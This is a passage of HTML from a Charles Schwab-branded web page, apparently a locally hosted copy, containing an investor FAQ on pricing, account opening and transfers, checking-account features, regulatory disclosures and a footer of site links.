            </section>

            <section class="encourage-section">
                <div class="container">
                    <div class="row encourage-row-heading">
                        <h2>We encourage your questions.</h2>
                    </div>
                    <div class="row ">
                        <p class="encourage-text">Here are answers to some top questions from investors like you:</p>
                        <div class="col-lg-8">
                            <div class="accordion accordion-flush" id="encourageAccordionExample">

                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-encourage collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#encourage-collapseOne" aria-expanded="false" aria-controls="encourage-collapseOne">
                                            What is the Schwab Security Guarantee?
                                        </button>
                                    </h2>
                                    <div id="encourage-collapseOne" class="accordion-collapse collapse" data-bs-parent="#encourageAccordionExample">
                                        <div class="accordion-body">Under the <a href="https://www.schwab.com/schwabsafe/security-guarantee">Schwab Security Guarantee</a>, Schwab will cover losses in any of your Schwab accounts due to unauthorized activity. Read more at <a href="https://www.schwab.com/schwabsafe/security-guarantee">Schwab.com/guarantee</a>.</div>
                                    </div>
                                </div>

                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-encourage collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#encourage-collapseTwo" aria-expanded="false" aria-controls="encourage-collapseTwo">
                                            How much does it cost to work with Schwab?
                                        </button>
                                    </h2>
                                    <div id="encourage-collapseTwo" class="accordion-collapse collapse" data-bs-parent="#encourageAccordionExample">
                                        <div class="accordion-body">
                                            <ul>
                                                <li>$0 online listed stock, option, and ETF trade commissions1,2</li>
                                                <li>Thousands of non-load, no-transaction-fee mutual funds3</li>
                                                <li>No charge to work with a Schwab Financial Consultant (other account fees, fund expenses, and brokerage commissions may apply)</li>
                                            </ul>
                                            <div>*<a href="https://www.schwab.com/pricing">See all our pricing</a></div>
                                            <div>
                                                <p>There are certain eligibility requirements for working with a dedicated Financial Consultant.</p>
                                                <p>1. Standard online $0 commission does not apply to over-the-counter (OTC) equities, transaction-fee mutual funds, futures, fixed-income investments, or trades placed directly on a foreign exchange or in the Canadian market. Options trades will be subject to the standard $0.65 per-contract fee. Service charges apply for trades placed through a broker ($25) or by automated phone ($5). Exchange process, ADR, and Stock Borrow fees still apply. See the <a href="https://www.schwab.com/legal/schwab-pricing-guide-for-individual-investors">Charles Schwab Pricing Guide for Individual Investors</a> for full fee and commission schedules.</p>

                                                <p>2. ETFs at Charles Schwab & Co., Inc. ("Schwab") which are U.S. exchange-listed can be traded without a commission on buy and sell transactions made online in a Schwab account. Unlisted ETFs are subject to a commission. Please see <a href="https://www.schwab.com/resource/charles-schwab-pricing-guide-for-individual-investors">pricing guide</a> for additional information. Schwab does not receive payment to promote any particular ETF to its customers. Schwab's affiliate Charles Schwab Investment Management, Inc. ("CSIM") serves as investment advisor to the Schwab ETFs, which compensate CSIM out of the applicable operating expense ratios. The amount of the fees is disclosed in the prospectus of each ETF.</p>
                                                <p>3. Trades in no load funds available through Schwab's Mutual Fund OneSource® service (including Schwab Funds), as well as certain other funds, are available without transaction fees when placed through schwab.com or our automated phone channels. For each of these trade orders placed through a broker, a $25 service charge applies. Schwab's short-term redemption fee of $49.95 will be charged on redemption of funds purchased through Mutual Fund OneSource® service and held for 90 days or less. Schwab reserves the right to change the funds we make available without transaction fees and to reinstate fees on any funds. Charles Schwab & Co., Inc. receives remuneration from fund companies participating in the Mutual Fund OneSource service for recordkeeping and shareholder services and other administrative services. Schwab also may receive remuneration from transaction fee fund companies for certain administrative services. </p>
                                                <p>There are no fees to open or maintain your account. Other account fees, fund expenses, and brokerage commissions may apply.</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>

                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-encourage collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#encourage-collapseThree" aria-expanded="false" aria-controls="encourage-collapseThree">
                                            How can I join you?
                                        </button>
                                    </h2>
                                    <div id="encourage-collapseThree" class="accordion-collapse collapse" data-bs-parent="#encourageAccordionExample">
                                        <div class="accordion-body">
                                            <p>You can open an account online, by phone, or in one of over 300 branches. <br> <a href="https://www.schwab.com/open-an-account">Click here</a> to open an account online in about 10 minutes.</p>
                                            <ol class="list-group list-group-numbered">
                                                <li class="list-group-item border-0">Choose your account type.</li>
                                                <li class="list-group-item border-0">Complete an application.</li>
                                                <li class="list-group-item border-0 mb-2">Get started funding and investing.</li>
                                            </ol>

                                            <p>Or call us at 800-435-4000 or <a href="https://client.schwab.com/public/branchlocator/accessschwab.aspx">find a branch</a>.</p>
                                        </div>
                                    </div>
                                </div>

                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-encourage collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#encourage-collapseFour" aria-expanded="false" aria-controls="encourage-collapseFour">
                                            What kind of investment products does Schwab offer?
                                        </button>
                                    </h2>
                                    <div id="encourage-collapseFour" class="accordion-collapse collapse" data-bs-parent="#encourageAccordionExample">
                                        <div class="accordion-body">
                                            <p>Schwab offers a wide selection of <a href="https://www.schwab.com/investment">investment products</a> to help you build a diversified portfolio and reach your goals. </p>
                                        </div>
                                    </div>
                                </div>

                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-encourage collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#encourage-collapseFive" aria-expanded="false" aria-controls="encourage-collapseFive">
                                            How easy is it to switch brokerage providers?
                                        </button>
                                    </h2>
                                    <div id="encourage-collapseFive" class="accordion-collapse collapse" data-bs-parent="#encourageAccordionExample">
                                        <div class="accordion-body">
                                            <p>Moving your existing account to a new brokerage firm may seem daunting, but Schwab makes the process easy:</p>
                                            <ol class="list-group list-group-numbered">
                                                <li class="list-group-item border-0"><a href="https://www.schwab.com/open-an-account">Open a Schwab account</a>.</li>
                                                <li class="list-group-item border-0">Use our online account transfer tool to initiate the process and monitor progress.</li>
                                                <li class="list-group-item border-0 mb-2">View and access your assets in your Schwab account.</li>
                                            </ol>

                                            <p>Need help? Our account transfer specialists can assist you every step of the way. <br> Call us at <strong>800-435-4000</strong>.</p>
                                            <p><a href="https://www.schwab.com/open-an-account">Click here</a> to open a Schwab account or <a href="https://client.schwab.com/Areas/Access/Login?ReturnUrl=%2fApps%2fService%2fTransferOfAccounts%2f&SessionTimeOut=Y#/getting-started">log in</a> to begin the transfer process.</p>
                                        </div>
                                    </div>
                                </div>

                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-encourage collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#encourage-collapseSix" aria-expanded="false" aria-controls="encourage-collapseSix">
                                            Why should I trust Schwab?
                                        </button>
                                    </h2>
                                    <div id="encourage-collapseSix" class="accordion-collapse collapse" data-bs-parent="#encourageAccordionExample">
                                        <div class="accordion-body">
                                            <div>
                                                <p>Schwab Bank Investor Checking™ is the checking account built for investors like you. It is conveniently linked to a Schwab One® Brokerage account so you get all the features of our award-winning checking account plus cash management solutions designed for investors like you—seamlessly in one place, with one login, only from Schwab.1</p>
                                            </div>
                                            <ul>
                                                <p>Enjoy features designed especially for investors:</p>
                                                <li>Quickly move money: move cash between brokerage and checking accounts in seconds and access it instantly for trading and investing2</li>
                                                <li>Manage both checking and investing with a single login</li>
                                            </ul>
                                            <p>Plus, get award-winning checking account benefits:</p>
                                            <ul>
                                                <li>No fees or minimums: Unlimited ATM fee rebates for cash withdrawals worldwide.3 Plus, no monthly service fees,4 account minimums, foreign transaction fees,3 or overdraft fees.</li>
                                                <li>Know your money is secure: Keep your money safe with features like fraud alerts and travel notifications, plus FDIC insurance on up to $250,000 per depositor.5 </li>
                                                <li>Access 24/7 assistance from dedicated teams</li>
                                                <li>Receive free standard checks once your account is funded with at least $100, and Schwab Bank Bill Pay™ will be activated and a Visa® Platinum Debit Card will be sent upon account funding.</li>
                                            </ul>
                                            <p>Open a Schwab Bank Investor Checking account <a href="https://www.schwab.com/checking">today</a>.</p>
                                            <div>
                                                <p>1. The Schwab Bank Investor Checking™ account is available only as a linked account with a Schwab One® brokerage account. The Schwab One brokerage account has no minimum balance requirements, no minimum balance charges, and no minimum trade requirements, and there is no requirement to fund this account when opened with a linked Investor Checking account. </p>

                                                <p>2. In general, cash moved from your brokerage account is available in seconds; however, during weekend and afterhours, it may not be available until the next business day.</p>

                                                <p>3. Unlimited ATM fee rebates apply to cash withdrawals using the Schwab Bank Visa® Platinum Debit Card wherever it is accepted. ATM fee rebates do not include any fees imposed by merchants or ATM operators for POS transactions, or fees for stamp purchases, balance inquiries, non-local ATM currency withdrawal fees (referred to as dynamic currency conversion fees), or any other transaction other than an ATM cash withdrawal in local currency from your Schwab Bank account. Schwab Bank makes its best effort to identify those ATM fees eligible for rebate based on information it receives from Visa and ATM operators. In the event that you have not received a rebate for a fee that you believe is eligible, please call a Schwab Bank Client Service Specialist for assistance at <strong>888-403-9000</strong> (or for clients of independent investment advisors, a Schwab Alliance Service team Member at <strong>800-515-2157</strong> ). Schwab Bank reserves the right to modify or discontinue the ATM surcharge rebate at any time.</p>

                                                <p>If you use your Card to withdraw foreign currency from an ATM or to pay for a purchase with foreign currency Schwab Bank charges your account for the U.S. dollar equivalent of the transaction. Depending on the specific arrangements that are in place, the exchange rate and calculation of the U.S. dollar equivalent will be done by the bank at which you conduct the transaction, the network to which the ATM belongs, or Visa. The bank or network may also charge a fee. Schwab Bank does not assess foreign transaction fees (i.e., a fee to convert U.S. dollars to local currency) to debit card holders. See the Schwab Bank Visa Debit Card Agreement for details.</p>

                                                <p>4. Schwab Bank's Investor Checking account has no account maintenance or activity fees. Fees may be assessed for additional services such as custom check orders, outgoing wires, or rush delivery. Review Schwab Bank's full Deposit Account Pricing Guide or contact Schwab Bank at 888-403-9000. Schwab Bank reserves the right to amend these terms at any time.</p>

                                                <p>5. Funds deposited at Charles Schwab Bank, SSB, are insured, in aggregate, up to $250,000 based on account ownership type by the Federal Deposit Insurance Corporation (FDIC). </p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>

            <section class="questions-section">
                <div class="container">
                    <div class="row question-row-heading text-center">
                        <h2>
                            Have more questions? We're here to help.
                        </h2>
                    </div>
                    <div class="row d-flex justify-content-center">
                        <div class="col-lg-3">
                            <div class="card text-center border-0">
                                <div class="card-img">
                                    <img src="assets/images/Call SVG_0.svg" class="img-fluid" alt="">
                                </div>
                                <div class="question-card-heading">
                                    <h3>Call</h3>
                                </div>
                                <div class="question-card-body">
                                    <span><strong>800-435-4000</strong></span>
                                </div>
                            </div>
                        </div>
                        <div class="col-lg-3">
                            <div class="card text-center border-0">
                                <div class="card-img">
                                    <img src="assets/images/Chat SVG_1.svg" class="img-fluid" alt="">
                                </div>
                                <div class="question-card-heading">
                                    <h3>Chat</h3>
                                </div>
                                <div class="question-card-body">
                                    <a href="#">
                                        <span>Get live online assistance 24/7</span>
                                        <i class="fa-solid fa-angle-right fa-xs"></i>
                                    </a>
                                </div>
                            </div>
                        </div>
                        <div class="col-lg-3">
                            <div class="card text-center border-0">
                                <div class="card-img">
                                    <img src="assets/images/Visit SVG_0.svg" class="img-fluid" alt="">
                                </div>
                                <div class="question-card-heading">
                                    <h3>Visit</h3>
                                </div>
                                <div class="question-card-body">
                                    <a href="https://client.schwab.com/Public/BranchLocator/AccessSchwab.aspx">
                                        <span>Find a branch near you</span>
                                        <i class="fa-solid fa-angle-right fa-xs"></i>
                                    </a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>

            <section class="advisors-section">
                <div class="container">
                    <div class="row advisors-row-heading">
                        <h2>
                            Other sites for advisors, wealth managers, and employers:
                        </h2>
                    </div>
                    <div class="row">
                        <div class="col-md-4">
                            <div class="card advisors-card">
                                <div class="advisors-card-heading">
                                    <h3>Advisors</h3>
                                </div>
                                <div class="advisors-card-detail">
                                    <p>Get information about going independent with <a href="https://advisorservices.schwab.com/why-schwab?ilc=WFJ">Schwab Advisor Services™</a> or becoming an independent franchise owner through <a href="https://franchise.schwab.com/why-schwab?ilc=WFI">Schwab Franchise.</a></p>
                                </div>
                            </div>
                        </div>
                        <div class="col-md-4">
                            <div class="card advisors-card">
                                <div class="advisors-card-heading">
                                    <h3>Wealth Management Professionals</h3>
                                </div>
                                <div class="advisors-card-detail">
                                    <p>Get information about Schwab Funds® and Schwab ETFs™ from <a href="https://www.schwabassetmanagement.com/welcome9?destination=/">
                                            Charles Schwab Wealth Management Inc.</a></p>
                                </div>
                            </div>
                        </div>
                        <div class="col-md-4">
                            <div class="card advisors-card">
                                <div class="advisors-card-heading">
                                    <h3>Employers</h3>
                                </div>
                                <div class="advisors-card-detail">
                                    <p>Get information about <a href="https://workplacefinancialservices.schwab.com/">Workplace Wealth Services.</a></p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>

            <section class="brokercheck-section">
                <div class="container">
                    <div class="row brokercheck-row">
                        <div class="col-md-8 p-0">
                            <h3>Check the background of Charles Schwab or one of its wealth experts using <a href="https://brokercheck.finra.org/">FINRA's BrokerCheck</a></h3>
                        </div>
                    </div>
                </div>
            </section>

            <section class="international-section">
                <div class="container">
                    <div class="row">
                        <div class="col-lg-2 me-5">
                            <div class="international-heading">
                                <h3>For Clients</h3>
                            </div>
                            <div class="internation-body">
                                <p><a href="https://www.schwab.com/digital-platform">Digital Platforms</a></p>
                                <p><a href="https://www.schwab.com/mobile">Schwab Mobile App</a></p>
                            </div>
                        </div>
                        <div class="col-lg-2 me-5">
                            <div class="international-heading">
                                <h3>Independent Branch</h3>
                            </div>
                            <div class="internation-body">
                                <p><a href="https://franchise.schwab.com/">Schwab Franchise</a></p>
                            </div>
                        </div>
                        <div class="col-lg-2 me-5">
                            <div class="international-heading">
                                <h3>About Schwab</h3>
                            </div>
                            <div class="internation-body">
                                <p><a href="https://www.aboutschwab.com/">Corporate Information</a></p>
                                <p><a href="https://www.schwabjobs.com/">Schwab Careers</a></p>
                                <p><a href="https://www.schwabmoneywise.com/foundation">Schwab Community Service</a></p>
                            </div>
                        </div>
                        <div class="col-lg-2 me-5">
                            <div class="international-heading">
                                <h3>International</h3>
                            </div>
                            <div class="internation-body">
                                <p><a href="https://www.schwab.com.hk/">Hong Kong, China</a></p>
                                <p><a href="https://www.schwab.co.uk/">London, UK</a></p>
                                <p><a href="https://international.schwab.com/">Other regions</a></p>
                            </div>
                        </div>
                        <div class="col-lg-2">
                            <div class="international-heading">
                                <h3>Multilingual Services</h3>
                            </div>
                            <div class="internation-body">
                                <p><a href="https://www.schwab.com/chinese-language-services-en">中文</a></p>
                            </div>
                        </div>
                    </div>
                </div>
            </section>

            <section class="portfolios-section">
                <div class="container">
                    <div class="row portfolios-row">
                        <p>Please read the <a href="https://www.schwab.com/resource/schwab-intelligent-portfolios-and-schwab-intelligent-portfolios-premium">Schwab Intelligent Portfolios Solutions™ disclosure brochures</a> for important information, pricing, and disclosures related to the Schwab Intelligent Portfolios and Schwab Intelligent Portfolios Premium programs.</p>

                        <p>Schwab Intelligent Portfolios® and Schwab Intelligent Portfolios Premium® are offered through Charles Schwab & Co. Inc. ("Schwab"), a dually registered investment advisor and broker-dealer. Portfolio management services are provided by Charles Schwab Wealth Management, Inc. ("CSWM"). Schwab and CSWM are subsidiaries of The Charles Schwab Corporation.</p>

                        <p>There are no advisory fees or commissions charged for Schwab Intelligent Portfolios. For Schwab Intelligent Portfolios Premium, there is a $300 initial planning fee upon enrollment and a $30-per-month advisory fee, charged quarterly, as outlined in the Schwab Intelligent Portfolios Solutions™ disclosure brochures. Participants in Schwab Intelligent Portfolios and Schwab Intelligent Portfolios Premium (collectively, "Schwab Intelligent Portfolios Solutions") do incur direct and indirect costs. These include ETF operating expenses, which are the management and other fees charged by the underlying ETFs. Schwab does not charge an advisory fee for the SIP Program due to the revenue Schwab Trust generates from the cash allocation (an indirect cost). The portfolios include a cash allocation to FDIC-insured Deposit Accounts at Charles Schwab Trust, SSB ("Schwab Trust"). Schwab Trust earns income from these deposits, and the more significant the cash allocation, the more income Schwab Trust earns. Lower interest rates paid on the cash allocation result in lower yields. Some cash alternatives outside Schwab Intelligent Portfolios Solutions offer higher yields. Schwab Intelligent Portfolios Solutions places funds in Schwab ETFs, and Charles Schwab Management Inc., a Schwab affiliate, receives management fees on those ETFs. It also places funds in third-party ETFs, and Schwab receives compensation from some of those ETFs for providing shareholder services, as well as from market centers where ETF trade orders are routed for execution. Fees and expenses will affect performance, and participants should consider all program requirements and costs before enrolling. For a complete overview of expenses, performance impact, conflicts of interest, and compensation received by Schwab and its affiliates, please refer to the Schwab Intelligent Portfolios Solutions disclosure brochures.</p>

                        <p>This advertising, and franchise sales information within it, is not intended as an offer to sell, or the solicitation of an offer to buy, a franchise. It is for informational purposes only. Currently, only the following states regulate the offer and sale of franchises: California, Hawaii, Illinois, Indiana, Maryland, Michigan, Minnesota, New York, North Dakota, Oregon, Rhode Island, South Dakota, Virginia, Washington, and Wisconsin. If you are a resident of one of these states, or if you wish to operate a franchise in one of these states, we will not offer you a franchise unless and until we have complied with any applicable pre-sale registration and disclosure requirements in that state.</p>

                        <p>Charles Schwab & Co., Inc., 3000 Schwab Way Westlake, TX 76262-8104</p>

                        <p>MN Franchise Registration Number: F-6699</p>

                        <p>Schwab Asset Management® is the dba name for Charles Schwab Management, Inc. (CSIM), the advisory firm for Schwab Funds and Schwab ETFs. Schwab Funds are distributed by Charles Schwab & Co., Inc. (Schwab), Member SIPC. Schwab ETFs are distributed by SEI Investments Distribution Co. (SIDCO). CSIM and Schwab are separate but affiliated companies and subsidiaries of The Charles Schwab Corporation, and are not affiliated with SIDCO.</p>

                        <p>*Schwab Network is brought to you by Charles Schwab Media Productions Company ("CSMPC"). CSMPC and Charles Schwab & Co., Inc. are separate but affiliated subsidiaries of The Charles Schwab Corporation. CSMPC is not a financial advisor, registered investment advisor, broker-dealer, or futures commissions merchant.</p>
                        <p>The Schwab Center for Financial Research is a division of Charles Schwab & Co., Inc.</p>

                        <p>(0324-KHFG, 0524-VCC9, 0224-KR6H, 1024-RRLK, 1124-2AT6)</p>
                    </div>
                </div>
            </section>

            <section class="investment-section">
                <div class="container">
                    <div class="row investment-row">
                        <div class="investment-text">
                            Assets and Insurance Products Are: Not FDIC Insured • Not Insured by Any Federal Government Agency • Not a Deposit or Other Obligation of, or Guaranteed by, the Trust or any of its Affiliates • Subject to Risk, Including Possible Loss of Principal Amount Placed
                        </div>
                    </div>
                    <div class="row investment-row-text">
                        <p>
                            The Charles Schwab Corporation offers a comprehensive range of brokerage, trust, and advisory services through its operating subsidiaries. Its broker-dealer subsidiary, Charles Schwab & Co. Inc. <a href="https://www.sipc.org/">(Member SIPC)</a>, and its affiliates provide asset management services and products. Its trust subsidiary, Charles Schwab Trust, SSB (member FDIC and an Equal Housing Lender), offers deposit and lending services and products.</p>
                        <p>This site is designed for U.S. residents. Non-U.S. residents are subject to country-specific restrictions. Learn more about our services for <a href="https://international.schwab.com/">non-U.S. residents</a>, <a href="https://www.schwab.com.hk/">Charles Schwab Hong Kong clients</a>, <a href="https://www.schwab.co.uk/">Charles Schwab U.K. clients</a>.</p>
                        <p>© 2024 Charles Schwab & Co., Inc. All rights reserved. <a href="https://www.sipc.org/">Member SIPC</a>. Unauthorized access is prohibited. Usage will be monitored.</p>
                    </div>
                </div>
            </section>

            <section class="footer-section">
                <footer>
                    <div class="container">
                        <div class="row social-icon-row">
                            <div class="d-flex justify-content-between flex-wrap">
                                <div class="social-icon d-flex">
                                    <div class="youtube me-2">
                                        <a href="https://www.youtube.com/channel/UCToe3dspZyw2L_JY-JmP3Mw" target="_blank"><i class="fa-brands fa-square-youtube fa-2xl" style="color: #ff0000;"></i></a>
                                    </div>
                                    <div class="twitter me-2">
                                        <a href="https://twitter.com/charlesschwab" target="_blank"><i class="fa-brands fa-square-twitter fa-2xl" style="color: #00a4f3;"></i></a>
                                    </div>
                                    <div class="facebook me-2">
                                        <a href="https://www.facebook.com/CharlesSchwab" target="_blank">
                                            <i class="fa-brands fa-square-facebook fa-2xl" style="color: #2a5a98;"></i>
                                        </a>
                                    </div>
                                    <div class="linkedin">
                                        <a href="https://www.linkedin.com/company/charles-schwab" target="_blank"><i class="fa-brands fa-linkedin fa-2xl" style="color: #0079ba;"></i></a>
                                    </div>
                                </div>
                                <div class="signature-img">
                                    <img src="assets/images/oyt.webp" class="img-fluid" alt="">
                                </div>
                            </div>
                        </div>
                        <!-- accordion row start -->
                        <div class="row footer-accordion-row">
                            <div class="accordion footer-accordion accordion-flush" id="menuAccordion">

                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-footer collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapseAccounts" aria-expanded="false" aria-controls="flush-collapseAccounts">
                                            Products
                                        </button>
                                    </h2>
                                    <div id="flush-collapseAccounts" class="accordion-collapse accordion-collapse-footer collapse" data-bs-parent="#menuAccordion">
                                        <div class="accordion-body">
                                            <ul class="list-unstyled">
                                                <li><a href="https://www.schwab.com/brokerage">Brokerage</a></li>
                                                <li><a href="https://www.schwab.com/ira/rollover-ira">401(k) Rollover</a></li>
                                                <li><a href="https://www.schwab.com/ira">Individual Retirement Accounts (IRAs)</a></li>
                                                <li><a href="https://www.schwab.com/checking">Schwab Bank Checking</a></li>
                                                <li><a href="https://www.schwab.com/small-business-retirement-plans">Small Business Retirement</a></li>
                                                <li><a href="https://www.schwab.com/open-an-account">See More Accounts</a></li>
                                            </ul>
                                        </div>
                                    </div>
                                </div>


                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-footer collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapseInvestment" aria-expanded="false" aria-controls="flush-collapseInvestment">
                                            Wealth Products
                                        </button>
                                    </h2>
                                    <div id="flush-collapseInvestment" class="accordion-collapse accordion-collapse-footer collapse" data-bs-parent="#menuAccordion">
                                        <div class="accordion-body">
                                            <ul class="list-unstyled">
                                                <li><a href="https://www.schwab.com/stocks">Stocks</a></li>
                                                <li><a href="https://www.schwab.com/mutual-funds">Mutual Funds</a></li>
                                                <li><a href="https://www.schwab.com/etfs">Exchange Traded Funds (ETFs)</a></li>
                                                <li><a href="https://www.schwab.com/annuities">Annuities</a></li>
                                                <li><a href="https://www.schwab.com/fixed-income">Bonds</a></li>
                                                <li><a href="https://www.schwab.com/investment">See More Investment Products</a></li>
                                            </ul>
                                        </div>
                                    </div>
                                </div>


                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-footer collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapseTrading" aria-expanded="false" aria-controls="flush-collapseTrading">
                                            Trading
                                        </button>
                                    </h2>
                                    <div id="flush-collapseTrading" class="accordion-collapse accordion-collapse-footer collapse" data-bs-parent="#menuAccordion">
                                        <div class="accordion-body">
                                            <ul class="list-unstyled">
                                                <li><a href="https://www.schwab.com/trading/thinkorswim">Trading Platforms</a></li>
                                                <li><a href="https://www.schwab.com/execution-quality">Execution Quality</a></li>
                                                <li><a href="https://www.schwab.com/options">Options</a></li>
                                                <li><a href="https://www.schwab.com/futures">Futures</a></li>
                                            </ul>
                                        </div>
                                    </div>
                                </div>


                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-footer collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapseResearch" aria-expanded="false" aria-controls="flush-collapseResearch">
                                            Research & Tools
                                        </button>
                                    </h2>
                                    <div id="flush-collapseResearch" class="accordion-collapse accordion-collapse-footer collapse" data-bs-parent="#menuAccordion">
                                        <div class="accordion-body">
                                            <ul class="list-unstyled">
                                                <li><a href="https://www.schwab.com/retirement-planning-tools/retirement-calculator">Retirement Calculator</a></li>
                                                <li><a href="https://www.schwab.com/ira/ira-calculators/roth-vs-traditional">Roth vs. Traditional IRA Calculator</a></li>
                                                <li><a href="https://www.schwab.com/investment-research">Research Tools</a></li>
                                                <li><a href="https://www.schwab.com/mobile">Mobile Apps</a></li>
                                            </ul>
                                        </div>
                                    </div>
                                </div>


                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-footer collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapseLearn" aria-expanded="false" aria-controls="flush-collapseLearn">
                                            Learn
                                        </button>
                                    </h2>
                                    <div id="flush-collapseLearn" class="accordion-collapse accordion-collapse-footer collapse" data-bs-parent="#menuAccordion">
                                        <div class="accordion-body">
                                            <ul class="list-unstyled">
                                                <li><a href="https://www.schwab.com/learn">Insights & Education</a></li>
                                                <li><a href="https://www.schwab.com/learn/trading">Trading</a></li>
                                                <li><a href="https://www.schwab.com/learn/market-commentary">Market Commentary</a></li>
                                                <li><a href="https://www.schwab.com/learn/planning">Planning & Retirement</a></li>
                                                <li><a href="https://www.schwab.com/learn/podcasts">Podcasts</a></li>
                                                <li><a href="https://www.schwab.com/schwab-network">Schwab Network</a></li>
                                            </ul>
                                        </div>
                                    </div>
                                </div>


                                <div class="accordion-item">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button accordion-button-footer collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapseAbout" aria-expanded="false" aria-controls="flush-collapseAbout">
                                            About Schwab
                                        </button>
                                    </h2>
                                    <div id="flush-collapseAbout" class="accordion-collapse accordion-collapse-footer collapse" data-bs-parent="#menuAccordion">
                                        <div class="accordion-body">
                                            <ul class="list-unstyled">
                                                <li><a href="https://www.schwab.com/why-schwab">Why Schwab</a></li>
                                                <li><a href="https://www.schwab.com/compare-us">Compare Us</a></li>
                                                <li><a href="https://www.schwab.com/satisfaction-guarantee">Satisfaction Guarantee</a></li>
                                                <li><a href="https://www.schwab.com/forms-and-applications">Forms & Applications</a></li>
                                                <li><a href="https://www.schwab.com/pricing">Pricing</a></li>
                                                <li><a href="https://www.schwab.com/life-events/losing-a-loved-one">Notify us of a Death</a></li>
                                            </ul>
                                        </div>
                                    </div>
                                </div>
                            </div>

                        </div>

                        <div class="row footer-list-row">
                            <div class="col-lg-2 px-0">
                                <span>Products</span>
                                <ul class="footer-list list-unstyled">
                                    <li><a href="https://www.schwab.com/brokerage">Brokerage</a></li>
                                    <li><a href="https://www.schwab.com/ira/rollover-ira">401(k) Rollover</a></li>
                                    <li><a href="https://www.schwab.com/ira">Individual Retirement Accounts (IRAs)</a></li>
                                    <li><a href="https://www.schwab.com/checking">Schwab Bank Checking</a></li>
                                    <li><a href="https://www.schwab.com/small-business-retirement-plans">Small Business Retirement</a></li>
                                    <li><a href="https://www.schwab.com/open-an-account">See More Accounts</a></li>
                                </ul>
                            </div>

                            <div class="col-lg-2 px-0">
                                <span>Wealth Products</span>
                                <ul class="footer-list list-unstyled">
                                    <li><a href="https://www.schwab.com/stocks">Stocks</a></li>
                                    <li><a href="https://www.schwab.com/mutual-funds">Mutual Funds</a></li>
                                    <li><a href="https://www.schwab.com/etfs">Exchange Traded Funds (ETFs)</a></li>
                                    <li><a href="https://www.schwab.com/annuities">Annuities</a></li>
                                    <li><a href="https://www.schwab.com/fixed-income">Bonds</a></li>
                                    <li><a href="https://www.schwab.com/investment">See More Investment Products</a></li>
                                </ul>
                            </div>

                            <div class="col-lg-2 px-0">
                                <span>Trading</span>
                                <ul class="footer-list list-unstyled">
                                    <li><a href="https://www.schwab.com/trading/thinkorswim">Trading Platforms</a></li>
                                    <li><a href="https://www.schwab.com/execution-quality">Execution Quality</a></li>
                                    <li><a href="https://www.schwab.com/options">Options</a></li>
                                    <li><a href="https://www.schwab.com/futures">Futures</a></li>
                                </ul>
                            </div>

                            <div class="col-lg-2 px-0">
                                <span>Research & Tools</span>
                                <ul class="footer-list list-unstyled">
                                    <li><a href="https://www.schwab.com/retirement-planning-tools/retirement-calculator">Retirement Calculator</a></li>
                                    <li><a href="https://www.schwab.com/ira/ira-calculators/roth-vs-traditional">Roth vs. Traditional IRA Calculator</a></li>
                                    <li><a href="https://www.schwab.com/investment-research">Research Tools</a></li>
                                    <li><a href="https://www.schwab.com/mobile">Mobile Apps</a></li>
                                </ul>
                            </div>

                            <div class="col-lg-2 px-0">
                                <span>Learn</span>
                                <ul class="footer-list list-unstyled">
                                    <li><a href="https://www.schwab.com/learn">Insights & Education</a></li>
                                    <li><a href="https://www.schwab.com/learn/trading">Trading</a></li>
                                    <li><a href="https://www.schwab.com/learn/market-commentary">Market Commentary</a></li>
                                    <li><a href="https://www.schwab.com/learn/planning">Planning & Retirement</a></li>
                                    <li><a href="https://www.schwab.com/learn/podcasts">Podcasts</a></li>
                                    <li><a href="https://www.schwab.com/schwab-network">Schwab Network</a></li>
                                </ul>
                            </div>

                            <div class="col-lg-2 px-0">
                                <span>About Schwab</span>
                                <ul class="footer-list list-unstyled">
                                    <li><a href="https://www.schwab.com/why-schwab">Why Schwab</a></li>
                                    <li><a href="https://www.schwab.com/compare-us">Compare Us</a></li>
                                    <li><a href="https://www.schwab.com/satisfaction-guarantee">Satisfaction Guarantee</a></li>
                                    <li><a href="https://www.schwab.com/forms-and-applications">Forms & Applications</a></li>
                                    <li><a href="https://www.schwab.com/pricing">Pricing</a></li>
                                    <li><a href="https://www.schwab.com/life-events/losing-a-loved-one">Notify us of a Death</a></li>
                                </ul>
                            </div>
                        </div>
                        <div class="row">
                            <div class="bottom-links">
                                <div>
                                    <i class="fa-solid fa-lock" style="color: #000000;"></i>
                                    <span><a href="https://www.schwab.com/schwabsafe">SchwabSafe</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/legal/privacy-overview">Privacy</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
